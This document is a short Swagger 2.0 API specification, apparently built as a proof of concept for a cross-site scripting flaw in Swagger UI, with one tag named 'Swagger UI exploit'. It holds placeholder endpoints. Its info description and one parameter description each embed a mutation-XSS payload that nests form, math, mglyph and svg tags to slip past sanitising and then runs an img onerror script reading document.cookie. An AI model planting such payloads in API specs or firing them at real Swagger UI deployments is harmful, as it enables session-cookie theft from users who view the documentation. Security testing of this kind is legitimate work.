---
swagger: '2.0'
info:
  title: Wisen Alert API
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea></textarea><img src=x onerror=alert(document.cookie)></form>

  version: production
basePath: /isms_test.com
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
  "/kbkim":
    get:
      responses:
        '200':
          description: No response was specified
      tags:
      - 1. Web API
      operationId: findAccounts
      summary: this is example text
  "/mjbang":
    delete:
      parameters:
      - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea></textarea><img src=x onerror=alert(document.cookie)></form>

        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - 2. Alert API
      operationId: afine
      summary: afine
    get:
      parameters:
      - description: this is example text
        format: int64
        in: path
        name: id
        required: true
        type: integer
      responses:
        '200':
          description: No response was specified
      tags:
      - Swagger UI exploit
      operationId: some_operation
      summary: this is example text
